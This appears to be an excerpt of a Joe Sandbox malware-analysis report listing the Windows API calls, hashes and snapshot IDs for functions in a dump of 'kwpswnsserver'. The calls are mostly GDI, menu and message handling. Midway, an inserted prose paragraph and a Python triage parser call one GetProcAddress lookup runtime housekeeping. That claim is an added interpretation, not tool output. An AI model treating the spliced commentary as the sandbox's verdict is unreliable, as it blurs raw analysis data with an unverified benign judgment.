                                                                  • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 6C88BD87
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Rect$Monitor$ClientCopyFromInfoLongParent$MessagePointsSend
                                                                  • String ID: (
                                                                  • API String ID: 3610148278-3887548279
                                                                  • Opcode ID: e63d52649129cf17f05cdc40038ee70ada2a9fc068bac5afa0bfe31f18b50275
                                                                  • Instruction ID: de6e320881ffd34f97d6dd3c7c431f0b36655ce39070583007397d5f7869fa8a
                                                                  • Opcode Fuzzy Hash: e63d52649129cf17f05cdc40038ee70ada2a9fc068bac5afa0bfe31f18b50275
                                                                  • Instruction Fuzzy Hash: 3E617172A0121EAFCF10DFA8CE88AEEB7B9FF85309F154614E505E7640DB30A946CB50
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 6C8A093C
                                                                  • CreateRectRgnIndirect.GDI32(?), ref: 6C8A0974
                                                                  • CopyRect.USER32(?,?), ref: 6C8A0988
                                                                  • InflateRect.USER32(?,?,?), ref: 6C8A099E
                                                                  • IntersectRect.USER32(?,?,?), ref: 6C8A09AA
                                                                  • CreateRectRgnIndirect.GDI32(?), ref: 6C8A09B4
                                                                  • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 6C8A09C9
                                                                  • CombineRgn.GDI32(?,?,?,00000003), ref: 6C8A09E3
                                                                  • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 6C8A0A2A
                                                                  • SetRectRgn.GDI32(?,?,00000004,?,?), ref: 6C8A0A47
                                                                  • CopyRect.USER32(?,?), ref: 6C8A0A52
                                                                  • InflateRect.USER32(?,?,?), ref: 6C8A0A68
                                                                  • IntersectRect.USER32(?,?,?), ref: 6C8A0A74
                                                                  • SetRectRgn.GDI32(?,?,?,?,?), ref: 6C8A0A89
                                                                  • CombineRgn.GDI32(?,?,?,00000003), ref: 6C8A0A9A
                                                                  • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 6C8A0AAE
                                                                  • CombineRgn.GDI32(?,?,?,00000003), ref: 6C8A0AC8
                                                                    • Part of subcall function 6C8A0891: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,?), ref: 6C8A08D8
                                                                    • Part of subcall function 6C8A0891: CreatePatternBrush.GDI32(00000000), ref: 6C8A08E5
                                                                    • Part of subcall function 6C8A0891: DeleteObject.GDI32(00000000), ref: 6C8A08F1
                                                                  • PatBlt.GDI32(00000004,?,?,?,?,005A0049), ref: 6C8A0B26
                                                                    • Part of subcall function 6C883483: SelectObject.GDI32(?,00000000), ref: 6C8834A3
                                                                    • Part of subcall function 6C883483: SelectObject.GDI32(?,00000000), ref: 6C8834B9
                                                                    • Part of subcall function 6C8838DA: SelectClipRgn.GDI32(?,00000000), ref: 6C8838FA
                                                                    • Part of subcall function 6C8838DA: SelectClipRgn.GDI32(?,00000000), ref: 6C883910
                                                                  • PatBlt.GDI32(00000004,?,?,?,?,005A0049), ref: 6C8A0B89
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Create$Select$CombineObject$ClipCopyIndirectInflateIntersect$BitmapBrushDeleteH_prolog3_Pattern
                                                                  • String ID:
                                                                  • API String ID: 770706554-0
                                                                  • Opcode ID: 50f7842f62dbd634b9230ba1cd6dbff7e0e6964a2e0cf3c5d321e5e6cda32887
                                                                  • Instruction ID: 5b6a8918574c718f49621934fb185ea6f1af61f09396ca8b10e5b5804523d293
                                                                  • Opcode Fuzzy Hash: 50f7842f62dbd634b9230ba1cd6dbff7e0e6964a2e0cf3c5d321e5e6cda32887
                                                                  • Instruction Fuzzy Hash: 6591F6B5A00219AFCF25EFE8DD94DEEBBB9BF48304B144529F506E3650DB34A905CB60
                                                                  APIs
                                                                  • InflateRect.USER32(?,00000004,00000004), ref: 6C8E6963
                                                                  • InvalidateRect.USER32(?,?,00000001), ref: 6C8E6975
                                                                  • UpdateWindow.USER32(?), ref: 6C8E697E
                                                                  • GetMessageW.USER32(?,00000000,0000000F,0000000F), ref: 6C8E69BF
                                                                  • DispatchMessageW.USER32(?), ref: 6C8E69D1
                                                                  • PeekMessageW.USER32(?,00000000,0000000F,0000000F,00000000), ref: 6C8E69E1
                                                                  • GetCapture.USER32 ref: 6C8E69EB
                                                                  • SetCapture.USER32(?), ref: 6C8E69FC
                                                                  • GetCapture.USER32 ref: 6C8E6A08
                                                                  • GetWindowRect.USER32(?,?), ref: 6C8E6A30
                                                                  • SetCursorPos.USER32(?,?), ref: 6C8E6A57
                                                                  • GetCapture.USER32 ref: 6C8E6A5D
                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 6C8E6A76
                                                                  • DispatchMessageW.USER32(?), ref: 6C8E6AA0
                                                                  • ReleaseCapture.USER32 ref: 6C8E6AE0
                                                                  • IsWindow.USER32(?), ref: 6C8E6AE9
                                                                  • SendMessageW.USER32(8589084D,00000010,00000000,00000000), ref: 6C8E6B02
                                                                  • SetTimer.USER32(?,0000EC05,00000000), ref: 6C8EA5BC
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Message$Capture$RectWindow$Dispatch$CursorInflateInvalidatePeekReleaseSendTimerUpdate
                                                                  • String ID:
                                                                  • API String ID: 3094444671-0
                                                                  • Opcode ID: b9300b92bcd926a3d0667fdd8d3004560b0966b43b4923b43208982ea1407119
                                                                  • Instruction ID: 59530ced82aa3dbe6cbeee13678df6da67266380de50d763d26f173b5ce4e287
                                                                  • Opcode Fuzzy Hash: b9300b92bcd926a3d0667fdd8d3004560b0966b43b4923b43208982ea1407119
                                                                  • Instruction Fuzzy Hash: C8B1B731B0131AABDF24EF68DE54AAE7775FF8A358F144529F605D7A80DB30A805CB50
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: #32768$AfxOldWndProc423
                                                                  • API String ID: 0-2141921550
                                                                  • Opcode ID: 2bb432139eb738a863c41b640ce6e07deb12b423b34e3a266564c966b5a80319
                                                                  • Instruction ID: d43180563eca5a9d4f695080652185fa0d3be51d2ce3bfe8e1fb64579aed8192
                                                                  • Opcode Fuzzy Hash: 2bb432139eb738a863c41b640ce6e07deb12b423b34e3a266564c966b5a80319
                                                                  • Instruction Fuzzy Hash: 255108356012299BCB31AF64CD48FAA3B74AF15758F108998F815E7E80CB30DE42CBD0
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 6C906137
                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 6C906165
                                                                  • GetObjectW.GDI32(?,00000018,?), ref: 6C90617E
                                                                  • SelectObject.GDI32(?,?), ref: 6C90619A
                                                                  • CreateCompatibleBitmap.GDI32(?,?,?), ref: 6C9061BB
                                                                  • SelectObject.GDI32(?,00000000), ref: 6C9061CC
                                                                  • CreateCompatibleDC.GDI32(?), ref: 6C9061E6
                                                                  • SelectObject.GDI32(?,?), ref: 6C9061FB
                                                                  • SelectObject.GDI32(?,00000000), ref: 6C90620C
                                                                  • DeleteObject.GDI32(?), ref: 6C906215
                                                                  • BitBlt.GDI32(?,00000000,00000000,000000FF,?,?,00000000,00000000,00CC0020), ref: 6C906235
                                                                  • GetPixel.GDI32(?,?,00000000), ref: 6C90625B
                                                                  • SetPixel.GDI32(?,?,00000000,00000000), ref: 6C9062A2
                                                                  • SelectObject.GDI32(?,?), ref: 6C9062C9
                                                                  • SelectObject.GDI32(?,00000000), ref: 6C9062D3
                                                                  • DeleteObject.GDI32(?), ref: 6C9062DB
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Object$Select$CompatibleCreate$DeletePixel$BitmapH_prolog3
                                                                  • String ID:
                                                                  • API String ID: 3639146769-0
                                                                  • Opcode ID: 8e0ed3858efc6ec4b18a226f42d709c05c52e4ffb59e0d0929a68a025a6e1f65
                                                                  • Instruction ID: 782059060f60ff9ff1bdace10713dfe26234580dd1c43477870e2a6dba99697c
                                                                  • Opcode Fuzzy Hash: 8e0ed3858efc6ec4b18a226f42d709c05c52e4ffb59e0d0929a68a025a6e1f65
                                                                  • Instruction Fuzzy Hash: 42515C71A0126AEFCF259FA8CD54AEEBB79FF09304F104529F815E3550DB319952CB50
                                                                  APIs
                                                                  • GetKeyState.USER32(00000001), ref: 6C8A4969
                                                                  • GetCursorPos.USER32(?), ref: 6C8A498E
                                                                  • ScreenToClient.USER32(?,?), ref: 6C8A499B
                                                                  • GetCapture.USER32 ref: 6C8A4A0D
                                                                  • ClientToScreen.USER32(?,?), ref: 6C8A4A50
                                                                  • WindowFromPoint.USER32(?,?), ref: 6C8A4A5C
                                                                  • IsChild.USER32(?,?), ref: 6C8A4A74
                                                                  • KillTimer.USER32(?,0000EC0A), ref: 6C8A4AB4
                                                                  • KillTimer.USER32(?,0000EC09), ref: 6C8A4ADD
                                                                    • Part of subcall function 6C88EC20: GetForegroundWindow.USER32 ref: 6C88EC2D
                                                                    • Part of subcall function 6C88EC20: GetLastActivePopup.USER32(?), ref: 6C88EC3E
                                                                  • GetParent.USER32(?), ref: 6C8A4B34
                                                                  • IsAppThemed.UXTHEME ref: 6C8A4B8E
                                                                  • OpenThemeData.UXTHEME(?,REBAR), ref: 6C8A4BA0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: ClientKillScreenTimerWindow$ActiveCaptureChildCursorDataForegroundFromLastOpenParentPointPopupStateThemeThemed
                                                                  • String ID: REBAR
                                                                  • API String ID: 214255902-925029515
                                                                  • Opcode ID: c17b30d3b85b696d250e638855eb1130fdcae25fa974b1e38b6c5748d353842f
                                                                  • Instruction ID: 897c225641e50896e7b78d3eb252d771fe1499444fa1cfe418408971b109dc06
                                                                  • Opcode Fuzzy Hash: c17b30d3b85b696d250e638855eb1130fdcae25fa974b1e38b6c5748d353842f
                                                                  • Instruction Fuzzy Hash: 75618530700216AFDF159FA8C994AAD7BB5BFC5348B104A79E816E7690EF709902CB54
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,?), ref: 6C8A603D
                                                                  • GetProcAddress.KERNEL32(00000000,GetThreadPreferredUILanguages), ref: 6C8A604D
                                                                  • EncodePointer.KERNEL32(00000000,?,?), ref: 6C8A6056
                                                                  • DecodePointer.KERNEL32(00000000,?,?), ref: 6C8A6064
                                                                  • GetUserDefaultUILanguage.KERNEL32(?,?), ref: 6C8A608B
                                                                  • ___crtDownlevelLCIDToLocaleName.LIBCPMT ref: 6C8A609B
                                                                  • ___crtDownlevelLCIDToLocaleName.LIBCPMT ref: 6C8A60CF
                                                                  • GetSystemDefaultUILanguage.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8A6102
                                                                  • ___crtDownlevelLCIDToLocaleName.LIBCPMT ref: 6C8A6112
                                                                  • ___crtDownlevelLCIDToLocaleName.LIBCPMT ref: 6C8A614F
                                                                  • ___crtDownlevelLCIDToLocaleName.LIBCPMT ref: 6C8A618A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: DownlevelLocaleName___crt$DefaultLanguagePointer$AddressDecodeEncodeHandleModuleProcSystemUser
                                                                  • String ID: GetThreadPreferredUILanguages$kernel32.dll
                                                                  • API String ID: 404278886-1646127487
                                                                  • Opcode ID: 51a094fb520475390cd9de826d906159326fab12fe8b8ca9e19ee22a76c9f71a
                                                                  • Instruction ID: 53960f57d61c5c5362a0997437764d8c072d1d96ccbfc0e45d0d617420899702
                                                                  • Opcode Fuzzy Hash: 51a094fb520475390cd9de826d906159326fab12fe8b8ca9e19ee22a76c9f71a
                                                                  • Instruction Fuzzy Hash: A8512CB290061AAFCB14DFA8CD84DEE77B9FF19304B014565E905E7650DB34EA0ACBA0
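The function listed above is the one place in this page where an API is resolved at run time: GetModuleHandleW(kernel32.dll) followed by GetProcAddress(..., GetThreadPreferredUILanguages), with the pointer then passed through EncodePointer/DecodePointer. The same function also calls ___crtDownlevelLCIDToLocaleName from LIBCPMT, so this particular lookup is consistent with the C runtime's own locale initialization rather than malware-authored import hiding; it is exactly the kind of hit that inflates a "dynamically determines API calls" verdict, and an analyst wants to pull such lookups out of a long listing and see what is actually being resolved. The following Python is an added triage helper, not code from Joe Sandbox or from the sample: it parses "APIs" bullet lines in the format used throughout this section (top-level calls and "Part of subcall function" lines), extracts module, API, arguments and the ref address, lists the symbols handed to GetProcAddress, and notes whether CRT helper modules (LIBCMT/LIBCPMT) appear in the same function. The sample listing embedded below is constructed to mirror the lines above; the function names parse_listing, resolved_symbols, calls_by_module and triage_listing are my own.

```python
import re
from typing import Dict, List, Optional

# Constructed sample in the shape of the report's "APIs" listing (bullet lines
# copied in form from the locale-resolution function at 6C8A603D..6C8A618A,
# plus one nested "Part of subcall function" line). Not tool output.
SAMPLE_LISTING = """\
APIs
• GetModuleHandleW.KERNEL32(kernel32.dll,?,?), ref: 6C8A603D
• GetProcAddress.KERNEL32(00000000,GetThreadPreferredUILanguages), ref: 6C8A604D
• EncodePointer.KERNEL32(00000000,?,?), ref: 6C8A6056
• DecodePointer.KERNEL32(00000000,?,?), ref: 6C8A6064
• GetUserDefaultUILanguage.KERNEL32(?,?), ref: 6C8A608B
• ___crtDownlevelLCIDToLocaleName.LIBCPMT ref: 6C8A609B
  • Part of subcall function 6C88EC20: GetForegroundWindow.USER32 ref: 6C88EC2D
"""

# One bullet line: optional "Part of subcall function XXXX:" prefix, then
# Api.MODULE, an optional "(args)," and the trailing "ref: ADDRESS".
LINE_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\),?|)\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Modules the report attributes to statically linked C runtime code.
CRT_MODULES = {"LIBCMT", "LIBCPMT"}


def parse_listing(text: str) -> List[Dict[str, object]]:
    """Turn the bullet lines of one function's "APIs" block into records.
    Lines that are not calls (the "APIs" header, blank lines) are skipped."""
    calls: List[Dict[str, object]] = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = m.group("args")
        calls.append({
            "api": m.group("api"),
            "module": m.group("mod").upper(),
            "args": [a.strip() for a in args.split(",")] if args else [],
            "ref": m.group("ref").upper(),
            # Address of the callee when the line came from a subcall.
            "subcall_of": (m.group("sub") or "").upper() or None,
        })
    return calls


def resolved_symbols(calls: List[Dict[str, object]]) -> List[str]:
    """Names passed as the second argument to GetProcAddress, i.e. the symbols
    resolved at run time instead of imported. '?' means the report could not
    recover the value, so it is not reported as a name."""
    names: List[str] = []
    for c in calls:
        args = c["args"]
        if c["api"] == "GetProcAddress" and len(args) >= 2 and args[1] != "?":
            names.append(args[1])
    return names


def calls_by_module(calls: List[Dict[str, object]]) -> Dict[str, List[str]]:
    """Group API names by the module the report attributes them to."""
    out: Dict[str, List[str]] = {}
    for c in calls:
        out.setdefault(c["module"], []).append(c["api"])
    return out


def triage_listing(text: str) -> Dict[str, object]:
    """Summarise one function block: does it resolve APIs dynamically, which
    names, and does the same function contain CRT helper calls (a hint that
    the lookup may be runtime housekeeping rather than deliberate hiding)."""
    calls = parse_listing(text)
    by_module = calls_by_module(calls)
    resolved = resolved_symbols(calls)
    return {
        "calls": len(calls),
        "modules": sorted(by_module),
        "dynamic_resolution": bool(resolved),
        "resolved_symbols": resolved,
        "has_crt_helpers": any(m in CRT_MODULES for m in by_module),
    }


if __name__ == "__main__":
    for key, value in triage_listing(SAMPLE_LISTING).items():
        print(f"{key}: {value}")
```

Run it over the whole "APIs" section of a report by splitting on the "APIs" header and feeding each block to triage_listing: functions with dynamic_resolution true and has_crt_helpers false, or with resolved names outside what a C runtime resolves, are the ones worth opening in the disassembler first.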
                                                                  APIs
                                                                    • Part of subcall function 6C8A00A7: GetFocus.USER32 ref: 6C8A00AB
                                                                    • Part of subcall function 6C8A00A7: GetParent.USER32(00000000), ref: 6C8A00CC
                                                                    • Part of subcall function 6C8A00A7: GetWindowLongW.USER32(00000000,000000F0), ref: 6C8A00EB
                                                                    • Part of subcall function 6C8A00A7: GetParent.USER32(00000000), ref: 6C8A00F9
                                                                    • Part of subcall function 6C8A00A7: GetDesktopWindow.USER32 ref: 6C8A0101
                                                                    • Part of subcall function 6C8A00A7: SendMessageW.USER32(00000000,0000014F,00000000,00000000), ref: 6C8A0115
                                                                  • GetMenu.USER32(?), ref: 6C894B09
                                                                  • GetMenuItemCount.USER32(?), ref: 6C894B47
                                                                  • GetSubMenu.USER32(?,00000000), ref: 6C894B5D
                                                                  • GetMenuItemCount.USER32(?), ref: 6C894B82
                                                                  • GetMenuItemID.USER32(?,00000000), ref: 6C894B9C
                                                                  • GetSubMenu.USER32(?,?), ref: 6C894BB8
                                                                  • GetMenuItemID.USER32(?,00000000), ref: 6C894BD0
                                                                  • GetMenuItemCount.USER32(?), ref: 6C894BF1
                                                                  • GetMenuItemID.USER32(?,?), ref: 6C894C27
                                                                  • SendMessageW.USER32(?,00000362,-0000E001,00000000), ref: 6C894CE3
                                                                  • UpdateWindow.USER32(?), ref: 6C894D04
                                                                  • GetKeyState.USER32(00000079), ref: 6C894D22
                                                                  • GetKeyState.USER32(00000012), ref: 6C894D33
                                                                  • GetParent.USER32(?), ref: 6C894DF5
                                                                  • PostMessageW.USER32(?,0000036A,00000000,00000000), ref: 6C894E0F
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                   • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$Item$CountMessageParentWindow$SendState$DesktopFocusLongPostUpdate
                                                                  • String ID:
                                                                  • API String ID: 1315724587-0
                                                                  • Opcode ID: 33c79407203ac32b7b859d7656ae5916662cd313877e7ab56eadb08b2c20d251
                                                                  • Instruction ID: df08d226ee1ebe9d86bdb730537a81d14664fdad7be9218f60d462031eb06c13
                                                                  • Opcode Fuzzy Hash: 33c79407203ac32b7b859d7656ae5916662cd313877e7ab56eadb08b2c20d251
                                                                  • Instruction Fuzzy Hash: DAC1C53570021AEFDB249F68CE84BADBBB5BFC5319F108969E825D7A50DB309841CB50
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 6C882AC6
                                                                  • GetSysColor.USER32(00000014), ref: 6C882AFD
                                                                    • Part of subcall function 6C883207: __EH_prolog3.LIBCMT ref: 6C88320E
                                                                    • Part of subcall function 6C883207: CreateSolidBrush.GDI32(6C88F6CB), ref: 6C883229
                                                                  • GetSysColor.USER32(00000010), ref: 6C882B12
                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 6C882B26
                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 6C882B3E
                                                                  • GetObjectW.GDI32(10C2C95B,00000018,?), ref: 6C882B61
                                                                  • CreateBitmap.GDI32(?,?,?,?,00000000), ref: 6C882B82
                                                                  • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 6C882BA3
                                                                    • Part of subcall function 6C883C26: SelectObject.GDI32(6C88F6CB,?), ref: 6C883C2F
                                                                  • GetPixel.GDI32(?,00000000,00000000), ref: 6C882BEB
                                                                    • Part of subcall function 6C883536: SetBkColor.GDI32(?,6C88F6CB), ref: 6C88354B
                                                                    • Part of subcall function 6C883536: SetBkColor.GDI32(?,6C88F6CB), ref: 6C88355D
                                                                  • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 6C882C14
                                                                  • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,001100A6), ref: 6C882C3E
                                                                  • BitBlt.GDI32(?,00000001,00000001,?,?,?,00000000,00000000,00E20746), ref: 6C882CA9
                                                                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00E20746), ref: 6C882CD2
                                                                  • DeleteDC.GDI32(00000000), ref: 6C882D47
                                                                  • DeleteDC.GDI32(00000000), ref: 6C882D66
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                   • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Create$Color$BitmapCompatibleDeleteH_prolog3Object$BrushPixelSelectSolid
                                                                  • String ID:
                                                                  • API String ID: 2254850417-0
                                                                  • Opcode ID: c08a162fffb2cd55f30199b18cc0893fb66783dbc57ede01834e8df3043a3f52
                                                                  • Instruction ID: 08491b056702d68c27816735f17d842b3e0c14b48d6b7e3acade84d8c2e958d0
                                                                  • Opcode Fuzzy Hash: c08a162fffb2cd55f30199b18cc0893fb66783dbc57ede01834e8df3043a3f52
                                                                  • Instruction Fuzzy Hash: A6817971902219AFDF219FE4DE55AEEBF79BF18304F104429F501B6AA0DB705E05DB60
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 6C8BECF5
                                                                  • GetClientRect.USER32(?,?), ref: 6C8BED13
